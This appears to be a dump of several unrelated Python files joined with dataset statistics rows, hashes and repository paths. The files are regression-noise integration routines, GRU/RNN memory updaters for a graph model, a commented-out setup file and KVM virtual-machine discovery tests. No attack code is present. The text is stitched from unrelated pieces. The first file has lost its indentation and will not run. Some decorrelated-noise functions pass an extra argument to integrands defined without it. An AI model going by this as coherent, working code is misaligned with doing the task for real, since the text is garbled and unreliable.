def sigma_hat_equation_L2_double_noise(m, q, sigma, delta_small, delta_large, eps):
borders = find_integration_borders_square(
lambda y, xi: sigma_integral_L2_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps
),
np.sqrt((1 + delta_small)),
1.0,
)
domain_xi, domain_y = divide_integration_borders_grid(borders)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
sigma_integral_L2_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
# ------------------
# L1 equations double noise
# ------------------
# ------------------
# Huber equations double noise
# ------------------
def m_hat_equation_Huber_double_noise(m, q, sigma, delta_small, delta_large, eps, a):
borders = find_integration_borders_square(
lambda y, xi: m_integral_Huber_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, a
),
np.sqrt((1 + delta_small)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
m_integral_Huber_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, a),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def q_hat_equation_Huber_double_noise(m, q, sigma, delta_small, delta_large, eps, a):
borders = find_integration_borders_square(
lambda y, xi: q_integral_Huber_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, a
),
np.sqrt((1 + delta_small)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_Huber_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, a),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def sigma_hat_equation_Huber_double_noise(m, q, sigma, delta_small, delta_large, eps, a):
borders = find_integration_borders_square(
lambda y, xi: sigma_integral_Huber_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, a
),
np.sqrt((1 + delta_small)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint_only_inside(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
sigma_integral_Huber_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, a),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
# ------------------
# BayesOpt equations decorrelated noise
# ------------------
def q_hat_equation_BO_decorrelated_noise(m, q, sigma, delta_small, delta_large, eps, beta):
borders = find_integration_borders_square(
lambda y, xi: q_integral_BO_decorrelated_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, beta
),
np.sqrt((1 + delta_small)),
1.0,
)
domain_xi, domain_y = divide_integration_borders_grid(borders)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_BO_decorrelated_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, beta),
)[0]
return integral_value
# ------------------
# L2 equations decorrelated noise
# ------------------
def m_hat_equation_L2_decorrelated_noise(m, q, sigma, delta_small, delta_large, eps, beta):
borders = find_integration_borders_square(
lambda y, xi: m_integral_L2_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, beta
),
np.sqrt((1 + delta_small)),
1.0,
)
domain_xi, domain_y = divide_integration_borders_grid(borders)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
m_integral_L2_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, beta),
)[0]
return integral_value
def q_hat_equation_L2_decorrelated_noise(m, q, sigma, delta_small, delta_large, eps, beta):
borders = find_integration_borders_square(
lambda y, xi: q_integral_L2_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, beta
),
np.sqrt((1 + delta_small)),
1.0,
)
domain_xi, domain_y = divide_integration_borders_grid(borders)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_L2_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, beta),
)[0]
return integral_value
def sigma_hat_equation_L2_decorrelated_noise(m, q, sigma, delta_small, delta_large, eps, beta):
borders = find_integration_borders_square(
lambda y, xi: sigma_integral_L2_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, beta
),
np.sqrt((1 + delta_small)),
1.0,
)
domain_xi, domain_y = divide_integration_borders_grid(borders)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
sigma_integral_L2_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, beta),
)[0]
return integral_value
# ------------------
# L1 equations decorrelated noise
# ------------------
# ------------------
# Huber equations decorrelated noise
# ------------------
def m_hat_equation_Huber_decorrelated_noise(m, q, sigma, delta_small, delta_large, eps, beta, a):
borders = find_integration_borders_square(
lambda y, xi: m_integral_Huber_decorrelated_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, beta, a
),
np.sqrt((1 + delta_small)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
m_integral_Huber_decorrelated_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, beta, a),
)[0]
return integral_value
def q_hat_equation_Huber_decorrelated_noise(m, q, sigma, delta_small, delta_large, eps, beta, a):
borders = find_integration_borders_square(
lambda y, xi: q_integral_Huber_decorrelated_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, beta, a
),
np.sqrt((1 + delta_small)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_Huber_decorrelated_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, beta, a),
)[0]
return integral_value
def sigma_hat_equation_Huber_decorrelated_noise(m, q, sigma, delta_small, delta_large, eps, beta, a):
borders = find_integration_borders_square(
lambda y, xi: sigma_integral_Huber_decorrelated_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, beta, a
),
np.sqrt((1 + delta_small)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
sigma_integral_Huber_decorrelated_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps, beta, a),
)[0]
return integral_value | 27.804625 | 112 | 0.557547 | 4,814 | 34,867 | 3.779809 | 0.021811 | 0.03825 | 0.065949 | 0.087931 | 0.964278 | 0.960266 | 0.948945 | 0.932568 | 0.924324 | 0.909705 | 0 | 0.022437 | 0.298248 | 34,867 | 1,254 | 113 | 27.804625 | 0.721228 | 0.031176 | 0 | 0.745605 | 0 | 0 | 0.007798 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.070321 | false | 0 | 0.004137 | 0.01758 | 0.149948 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4343fb0d359e2ee63fe73f9a5976758b6d07bf96 | 6,346 | py | Python | modules/memory_updater.py | pige99/TME | b069ed159c6ae8835591af13b3fb2bc418e2fef9 | [
"MIT"
] | 3 | 2021-07-26T04:52:25.000Z | 2022-02-10T04:33:44.000Z | modules/memory_updater.py | pige99/TME | b069ed159c6ae8835591af13b3fb2bc418e2fef9 | [
"MIT"
] | null | null | null | modules/memory_updater.py | pige99/TME | b069ed159c6ae8835591af13b3fb2bc418e2fef9 | [
"MIT"
] | null | null | null | from torch import nn
import torch
import time
class MemoryUpdater(nn.Module):
def update_memory(self, unique_node_ids, unique_messages, timestamps):
pass
class SequenceMemoryUpdater(MemoryUpdater):
def __init__(self, memory, message_dimension, memory_dimension, device):
super(SequenceMemoryUpdater, self).__init__()
self.memory = memory
self.layer_norm = torch.nn.LayerNorm(memory_dimension)
self.message_dimension = message_dimension
self.device = device
def update_memory(self, unique_node_ids, unique_messages, timestamps):
if len(unique_node_ids) <= 0:
return
assert (self.memory.get_last_update(unique_node_ids) <= timestamps).all().item(), "Trying to " \
"update memory to time in the past"
memory = self.memory.get_memory(unique_node_ids)
self.memory.last_update[unique_node_ids] = timestamps
updated_memory = self.memory_updater(unique_messages, memory)
self.memory.set_memory(unique_node_ids, updated_memory)
def get_updated_memory(self, unique_node_ids, unique_messages, timestamps):
if len(unique_node_ids) <= 0:
return self.memory.memory.data.clone(), self.memory.last_update.data.clone()
assert (self.memory.get_last_update(unique_node_ids) <= timestamps).all().item(), "Trying to " \
"update memory to time in the past"
updated_memory = self.memory.memory.data.clone()
updated_memory[unique_node_ids] = self.memory_updater(unique_messages, updated_memory[unique_node_ids])
updated_last_update = self.memory.last_update.data.clone()
updated_last_update[unique_node_ids] = timestamps
return updated_memory, updated_last_update
class RNNMemoryUpdater(SequenceMemoryUpdater):
def __init__(self, memory, message_dimension, memory_dimension, device):
super(RNNMemoryUpdater, self).__init__(memory, message_dimension, memory_dimension, device)
self.memory_updater = nn.RNNCell(input_size=message_dimension,
hidden_size=memory_dimension)
class GRUMemoryUpdater(nn.Module):
def __init__(self, memory, message_dimension, memory_dimension, device):
super(GRUMemoryUpdater, self).__init__()
self.memory = memory
# self.layer_norm = torch.nn.LayerNorm(memory_dimension)
self.message_dimension = message_dimension
self.device = device
self.memory_updater = nn.GRUCell(input_size=message_dimension,
hidden_size=memory_dimension)
def update_memory(self, unique_node_ids, unique_messages, timestamps):
if len(unique_node_ids) <= 0:
return
assert (self.memory.get_last_update(unique_node_ids) <= timestamps).all().item(), "Trying to " \
"update memory to time in the past"
memory = self.memory.get_memory(unique_node_ids)
self.memory.last_update[unique_node_ids] = timestamps
updated_memory = self.memory_updater(unique_messages, memory)
self.memory.set_memory(unique_node_ids, updated_memory)
def get_updated_memory(self, unique_node_ids, unique_messages, timestamps):
if len(unique_node_ids) <= 0:
return self.memory.memory.data.clone(), self.memory.last_update.data.clone()
assert (self.memory.get_last_update(unique_node_ids) <= timestamps).all().item(), "Trying to " \
"update memory to time in the past"
updated_memory = self.memory.memory.data.clone()
updated_memory[unique_node_ids] = self.memory_updater(unique_messages, updated_memory[unique_node_ids])
updated_last_update = self.memory.last_update.data.clone()
updated_last_update[unique_node_ids] = timestamps
return updated_memory, updated_last_update
class GRULongMemoryUpdater(nn.Module):
def __init__(self, memory, message_dimension, memory_dimension, device):
super(GRULongMemoryUpdater, self).__init__()
self.memory = memory
# self.layer_norm = torch.nn.LayerNorm(memory_dimension)
self.message_dimension = message_dimension
self.device = device
self.memory_updater = nn.GRU(input_size=message_dimension,
hidden_size=memory_dimension)
def update_memory(self, unique_node_ids, unique_messages, timestamps):
if len(unique_node_ids) <= 0:
return
assert (self.memory.get_last_update(unique_node_ids) <= timestamps).all().item(), "Trying to " \
"update memory to time in the past"
memory = self.memory.get_memory(unique_node_ids)
self.memory.last_update[unique_node_ids] = timestamps
outputs, h_n = self.memory_updater(unique_messages, torch.unsqueeze(memory, 0))
updated_memory = torch.squeeze(h_n)
self.memory.set_memory(unique_node_ids, updated_memory)
def get_updated_memory(self, unique_node_ids, unique_messages, timestamps):
if len(unique_node_ids) <= 0:
return self.memory.memory.data.clone(), self.memory.last_update.data.clone()
assert (self.memory.get_last_update(unique_node_ids) <= timestamps).all().item(), "Trying to " \
"update memory to time in the past"
updated_memory = self.memory.memory.data.clone()
outputs, h_n = self.memory_updater(unique_messages,
torch.unsqueeze(updated_memory[unique_node_ids], 0))
updated_memory[unique_node_ids] = torch.squeeze(h_n)
updated_last_update = self.memory.last_update.data.clone()
updated_last_update[unique_node_ids] = timestamps
return updated_memory, updated_last_update
def get_memory_updater(module_type, memory, message_dimension, memory_dimension, device):
if module_type == "gru":
return GRUMemoryUpdater(memory, message_dimension, memory_dimension, device)
elif module_type == "rnn":
return RNNMemoryUpdater(memory, message_dimension, memory_dimension, device)
elif module_type =="gru_long":
return GRULongMemoryUpdater(memory, message_dimension, memory_dimension, device)
| 43.465753 | 120 | 0.684841 | 755 | 6,346 | 5.419868 | 0.084768 | 0.105083 | 0.117546 | 0.058651 | 0.888563 | 0.871212 | 0.839687 | 0.839687 | 0.827468 | 0.799609 | 0 | 0.00163 | 0.226599 | 6,346 | 145 | 121 | 43.765517 | 0.832111 | 0.017176 | 0 | 0.712871 | 0 | 0 | 0.043632 | 0 | 0 | 0 | 0 | 0 | 0.059406 | 1 | 0.118812 | false | 0.009901 | 0.029703 | 0 | 0.316832 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4ac478638285654ac9520e71281a3b55693cdbdf | 79 | py | Python | halotools/empirical_models/abunmatch/engines/__init__.py | pllim/halotools | 6499cff09e7e0f169e4f425ee265403f6be816e8 | [
"BSD-3-Clause"
] | 83 | 2015-01-15T14:54:16.000Z | 2021-12-09T11:28:02.000Z | halotools/empirical_models/abunmatch/engines/__init__.py | pllim/halotools | 6499cff09e7e0f169e4f425ee265403f6be816e8 | [
"BSD-3-Clause"
] | 579 | 2015-01-14T15:57:37.000Z | 2022-01-13T18:58:44.000Z | halotools/empirical_models/abunmatch/engines/__init__.py | pllim/halotools | 6499cff09e7e0f169e4f425ee265403f6be816e8 | [
"BSD-3-Clause"
] | 70 | 2015-01-14T15:15:58.000Z | 2021-12-22T18:18:31.000Z | from .bin_free_cam_kernel import cython_bin_free_cam_kernel, get_value_at_rank
| 39.5 | 78 | 0.911392 | 15 | 79 | 4.133333 | 0.733333 | 0.225806 | 0.322581 | 0.516129 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063291 | 79 | 1 | 79 | 79 | 0.837838 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
436ce6ac48819c289862a23c3aa5c5d12e6d9738 | 2,624 | py | Python | gala/potential/setup_package.py | ltlancas/gala | 2621bb599d67e74a85446abf72d5930ef70ca181 | [
"MIT"
] | 1 | 2021-10-14T03:36:15.000Z | 2021-10-14T03:36:15.000Z | gala/potential/setup_package.py | ltlancas/gala | 2621bb599d67e74a85446abf72d5930ef70ca181 | [
"MIT"
] | null | null | null | gala/potential/setup_package.py | ltlancas/gala | 2621bb599d67e74a85446abf72d5930ef70ca181 | [
"MIT"
] | null | null | null | # from __future__ import absolute_import
# from distutils.core import Extension
# from astropy_helpers import setup_helpers
# def get_extensions():
# exts = []
# # malloc
# mac_incl_path = "/usr/include/malloc"
# # Potentials
# cfg = setup_helpers.DistutilsExtensionArgs()
# cfg['include_dirs'].append('numpy')
# cfg['include_dirs'].append(mac_incl_path)
# cfg['include_dirs'].append('gala/potential')
# cfg['extra_compile_args'].append('--std=gnu99')
# cfg['sources'].append('gala/potential/cpotential.pyx')
# cfg['sources'].append('gala/potential/src/cpotential.c')
# exts.append(Extension('gala.potential.cpotential', **cfg))
# cfg = setup_helpers.DistutilsExtensionArgs()
# cfg['include_dirs'].append('numpy')
# cfg['include_dirs'].append(mac_incl_path)
# cfg['include_dirs'].append('gala/potential')
# cfg['extra_compile_args'].append('--std=gnu99')
# cfg['sources'].append('gala/potential/ccompositepotential.pyx')
# cfg['sources'].append('gala/potential/src/cpotential.c')
# exts.append(Extension('gala.potential.ccompositepotential', **cfg))
# cfg = setup_helpers.DistutilsExtensionArgs()
# cfg['include_dirs'].append('numpy')
# cfg['include_dirs'].append(mac_incl_path)
# cfg['include_dirs'].append('gala/potential')
# cfg['extra_compile_args'].append('--std=gnu99')
# cfg['sources'].append('gala/potential/builtin/cybuiltin.pyx')
# cfg['sources'].append('gala/potential/builtin/src/builtin_potentials.c')
# cfg['sources'].append('gala/potential/src/cpotential.c')
# exts.append(Extension('gala.potential.builtin.cybuiltin', **cfg))
# # Frames
# cfg = setup_helpers.DistutilsExtensionArgs()
# cfg['include_dirs'].append('numpy')
# cfg['include_dirs'].append(mac_incl_path)
# cfg['include_dirs'].append('gala/potential')
# cfg['extra_compile_args'].append('--std=gnu99')
# cfg['sources'].append('gala/potential/cframe.pyx')
# exts.append(Extension('gala.potential.cframe', **cfg))
# cfg = setup_helpers.DistutilsExtensionArgs()
# cfg['include_dirs'].append('numpy')
# cfg['include_dirs'].append(mac_incl_path)
# cfg['include_dirs'].append('gala/potential')
# cfg['extra_compile_args'].append('--std=gnu99')
# cfg['sources'].append('gala/potential/builtin/frames.pyx')
# cfg['sources'].append('gala/potential/builtin/src/builtin_frames.c')
# exts.append(Extension('gala.potential.builtin.frames', **cfg))
# return exts
def get_package_data():
return {'gala.potential': ['src/funcdefs.h', 'potential/src/cpotential.h']}
| 41.650794 | 79 | 0.685595 | 308 | 2,624 | 5.665584 | 0.155844 | 0.156447 | 0.120344 | 0.17192 | 0.785673 | 0.767335 | 0.767335 | 0.740401 | 0.740401 | 0.684241 | 0 | 0.004373 | 0.12843 | 2,624 | 62 | 80 | 42.322581 | 0.758636 | 0.916921 | 0 | 0 | 0 | 0 | 0.331288 | 0.159509 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 11 |
43890a5c77fd8b2bff1f236f98669e7a0d290d4e | 18,538 | py | Python | enjoliver-testsuite/euid/discovery/test_kvm_discovery_client.py | netturpin/enjoliver | 9700470939da40ff84304af6e8c7210a5fd693a4 | [
"MIT"
] | 11 | 2017-11-06T08:42:55.000Z | 2021-01-08T11:01:02.000Z | enjoliver-testsuite/euid/discovery/test_kvm_discovery_client.py | netturpin/enjoliver | 9700470939da40ff84304af6e8c7210a5fd693a4 | [
"MIT"
] | 7 | 2017-12-28T12:05:50.000Z | 2021-04-02T15:04:46.000Z | enjoliver-testsuite/euid/discovery/test_kvm_discovery_client.py | netturpin/enjoliver | 9700470939da40ff84304af6e8c7210a5fd693a4 | [
"MIT"
] | 4 | 2017-11-08T10:03:31.000Z | 2018-06-03T17:59:43.000Z | import os
import sys
import time
import unittest
from enjoliver import generator
try:
import kvm_player
except ImportError:
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import kvm_player
class TestKVMDiscoveryClient(kvm_player.KernelVirtualMachinePlayer):
@classmethod
def setUpClass(cls):
cls.set_rack0()
cls.running_requirements()
cls.set_api()
cls.set_matchbox()
cls.set_dnsmasq()
cls.pause(cls.wait_setup_teardown)
class TestKVMDiscoveryClient00(TestKVMDiscoveryClient):
"""
node_nb: 1
Interfaces
"""
def test_00(self):
marker = "euid-%s-%s" % (TestKVMDiscoveryClient.__name__.lower(), self.test_00.__name__)
gen = generator.Generator(
api_uri=self.api_uri,
profile_id="%s" % marker,
name="%s" % marker,
ignition_id="%s.yaml" % marker,
matchbox_path=self.test_matchbox_path
)
gen.dumps()
self.clean_up_virtual_machine(marker)
interfaces = {}
try:
virt_install = self.create_virtual_machine(marker, 1)
self.virsh(virt_install, assertion=True, v=self.dev_null)
for i in range(60):
interfaces = self.fetch_discovery_interfaces()
if len(interfaces) > 0:
break
time.sleep(self.testing_sleep_seconds)
# Just one machine
self.assertEqual(len(interfaces), 1)
for i in interfaces:
self.assertEqual(i["name"], "eth0")
self.assertEqual(i["netmask"], 16)
self.assertEqual(i["ipv4"][:9], '172.20.0.')
self.assertEqual(len(i["mac"]), 17)
self.assertTrue(i["as_boot"])
self.write_ending(marker)
finally:
self.clean_up_virtual_machine(marker)
# @unittest.skip("just skip")
class TestKVMDiscoveryClient01(TestKVMDiscoveryClient):
"""
node_nb: 3
Interfaces
"""
def test_01(self):
nb_node = 3
marker = "euid-%s-%s" % (TestKVMDiscoveryClient.__name__.lower(), self.test_01.__name__)
gen = generator.Generator(
api_uri=self.api_uri,
profile_id="%s" % marker,
name="%s" % marker,
ignition_id="%s.yaml" % marker,
matchbox_path=self.test_matchbox_path
)
gen.dumps()
interfaces = {}
try:
for i in range(nb_node):
machine_marker = "%s-%d" % (marker, i)
destroy, undefine = ["virsh", "destroy", "%s" % machine_marker], \
["virsh", "undefine", "%s" % machine_marker]
self.virsh(destroy, v=self.dev_null), self.virsh(undefine, v=self.dev_null)
virt_install = [
"virt-install",
"--name",
"%s" % machine_marker,
"--network=bridge:rack0,model=virtio",
"--memory=1024",
"--vcpus=%d" % self.get_optimized_cpu(nb_node),
"--pxe",
"--disk",
"none",
"--os-type=linux",
"--os-variant=generic",
"--noautoconsole",
"--boot=network"
]
self.virsh(virt_install, assertion=True, v=self.dev_null)
time.sleep(self.testing_sleep_seconds) # KVM fail to associate nic
for i in range(60):
interfaces = self.fetch_discovery_interfaces()
if len(interfaces) == nb_node:
break
time.sleep(self.testing_sleep_seconds)
# Several machines
self.assertEqual(len(interfaces), nb_node)
for i in interfaces:
self.assertEqual(i["name"], "eth0")
self.assertEqual(i["netmask"], 16)
self.assertEqual(i["ipv4"][:9], '172.20.0.')
self.assertEqual(len(i["mac"]), 17)
self.assertTrue(i["as_boot"])
self.write_ending(marker)
finally:
for i in range(nb_node):
machine_marker = "%s-%d" % (marker, i)
destroy, undefine = ["virsh", "destroy", "%s" % machine_marker], \
["virsh", "undefine", "%s" % machine_marker]
self.virsh(destroy)
self.virsh(undefine)
# @unittest.skip("just skip")
class TestKVMDiscoveryClient02(TestKVMDiscoveryClient):
"""
node_nb: 1
Interfaces
LLDP
"""
@classmethod
def setUpClass(cls):
cls.running_requirements()
cls.set_rack0()
cls.set_acserver()
cls.set_api()
cls.set_matchbox()
cls.set_dnsmasq()
cls.set_lldp()
cls.pause(cls.wait_setup_teardown)
def test_02(self):
marker = "euid-%s-%s" % (TestKVMDiscoveryClient.__name__.lower(), self.test_02.__name__)
gen = generator.Generator(
api_uri=self.api_uri,
profile_id="%s" % marker,
name="%s" % marker,
ignition_id="%s.yaml" % marker,
matchbox_path=self.test_matchbox_path,
extra_metadata={
"lldp_image_url": self.ec.lldp_image_url,
"etc_hosts": self.ec.etc_hosts,
}
)
gen.dumps()
destroy, undefine = ["virsh", "destroy", "%s" % marker], ["virsh", "undefine", "%s" % marker]
self.virsh(destroy, v=self.dev_null), self.virsh(undefine, v=self.dev_null)
interfaces = []
try:
virt_install = [
"virt-install",
"--name",
"%s" % marker,
"--network=bridge:rack0,model=virtio",
"--memory=2048",
"--vcpus=%d" % self.get_optimized_cpu(1),
"--pxe",
"--disk",
"none",
"--os-type=linux",
"--os-variant=generic",
"--noautoconsole",
"--boot=network"
]
self.virsh(virt_install, assertion=True, v=self.dev_null)
for i in range(60):
interfaces = self.fetch_discovery_interfaces()
if len(interfaces) > 0:
break
time.sleep(self.testing_sleep_seconds)
self.assertEqual(len(interfaces), 1)
for interface in interfaces:
self.assertIsNotNone(interface["chassis_name"])
self.assertEqual(interface["name"], "eth0")
self.assertEqual(interface["netmask"], 16)
self.assertEqual(interface["ipv4"][:9], '172.20.0.')
self.assertEqual(len(interface["mac"]), 17)
self.assertTrue(interface["as_boot"])
self.write_ending(marker)
finally:
self.virsh(destroy)
self.virsh(undefine)
# @unittest.skip("just skip")
class TestKVMDiscoveryClient03(TestKVMDiscoveryClient):
"""
node_nb: 3
Interfaces
LLDP
"""
@classmethod
def setUpClass(cls):
cls.running_requirements()
cls.set_rack0()
cls.set_acserver()
cls.set_api()
cls.set_matchbox()
cls.set_dnsmasq()
cls.set_lldp()
cls.pause(cls.wait_setup_teardown)
def test_03(self):
nb_node = 3
marker = "euid-%s-%s" % (TestKVMDiscoveryClient.__name__.lower(), self.test_03.__name__)
gen = generator.Generator(
api_uri=self.api_uri,
profile_id="%s" % marker,
name="%s" % marker,
ignition_id="%s.yaml" % marker,
matchbox_path=self.test_matchbox_path,
extra_metadata={
"lldp_image_url": self.ec.lldp_image_url,
"etc_hosts": self.ec.etc_hosts,
}
)
gen.dumps()
destroy, undefine = ["virsh", "destroy", "%s" % marker], ["virsh", "undefine", "%s" % marker]
self.virsh(destroy, v=self.dev_null), self.virsh(undefine, v=self.dev_null)
interfaces = []
try:
for i in range(nb_node):
machine_marker = "%s-%d" % (marker, i)
destroy, undefine = ["virsh", "destroy", "%s" % machine_marker], \
["virsh", "undefine", "%s" % machine_marker]
self.virsh(destroy, v=self.dev_null), self.virsh(undefine, v=self.dev_null)
virt_install = [
"virt-install",
"--name",
"%s" % machine_marker,
"--network=bridge:rack0,model=virtio",
"--memory=2048",
"--vcpus=%d" % self.get_optimized_cpu(1),
"--pxe",
"--disk",
"none",
"--os-type=linux",
"--os-variant=generic",
"--noautoconsole",
"--boot=network"
]
self.virsh(virt_install, assertion=True, v=self.dev_null)
time.sleep(self.testing_sleep_seconds) # KVM fail to associate nic
for i in range(60):
interfaces = self.fetch_discovery_interfaces()
if len(interfaces) == nb_node:
break
time.sleep(self.testing_sleep_seconds)
# Checks
self.assertEqual(len(interfaces), 3)
for interface in interfaces:
self.assertIsNotNone(interface["chassis_name"])
self.assertEqual(interface["name"], "eth0")
self.assertEqual(interface["netmask"], 16)
self.assertEqual(interface["ipv4"][:9], '172.20.0.')
self.assertEqual(len(interface["mac"]), 17)
self.assertTrue(interface["as_boot"])
self.assertEqual(1, len(set([k["chassis_name"] for k in interfaces])))
self.write_ending(marker)
finally:
if os.getenv("TEST"):
self.iteractive_usage()
for i in range(nb_node):
machine_marker = "%s-%d" % (marker, i)
destroy, undefine = ["virsh", "destroy", "%s" % machine_marker], \
["virsh", "undefine", "%s" % machine_marker]
self.virsh(destroy)
self.virsh(undefine)
# @unittest.skip("just skip")
class TestKVMDiscoveryClient04(TestKVMDiscoveryClient):
"""
Ignition Journal
"""
def test_04(self):
marker = "euid-%s-%s" % (TestKVMDiscoveryClient.__name__.lower(), self.test_04.__name__)
gen = generator.Generator(
api_uri=self.api_uri,
profile_id="%s" % marker,
name="%s" % marker,
ignition_id="%s.yaml" % marker,
matchbox_path=self.test_matchbox_path,
extra_metadata={
"lldp_image_url": self.ec.lldp_image_url,
"etc_hosts": self.ec.etc_hosts,
}
)
gen.dumps()
destroy, undefine = ["virsh", "destroy", "%s" % marker], ["virsh", "undefine", "%s" % marker]
self.virsh(destroy, v=self.dev_null), self.virsh(undefine, v=self.dev_null)
try:
virt_install = [
"virt-install",
"--name",
"%s" % marker,
"--network=bridge:rack0,model=virtio",
"--memory=1024",
"--vcpus=%d" % self.get_optimized_cpu(1),
"--pxe",
"--disk",
"none",
"--os-type=linux",
"--os-variant=generic",
"--noautoconsole",
"--boot=network"
]
self.virsh(virt_install, assertion=True, v=self.dev_null)
disco_data = dict()
for i in range(60):
disco_data = self.fetch_discovery()
if disco_data and len(disco_data) == 1:
break
time.sleep(self.testing_sleep_seconds)
self.assertEqual(1, len(disco_data))
lines = self.fetch_discovery_ignition_journal(disco_data[0]["boot-info"]["uuid"])
self.assertIs(type(lines), list)
self.assertTrue(len(lines) > 0)
self.write_ending(marker)
finally:
self.virsh(destroy)
self.virsh(undefine)
# @unittest.skip("just skip")
class TestKVMDiscoveryClient05(TestKVMDiscoveryClient):
"""
node_nb: 1 2 interfaces
Interfaces
"""
def test_05(self):
marker = "euid-%s-%s" % (TestKVMDiscoveryClient.__name__.lower(), self.test_05.__name__)
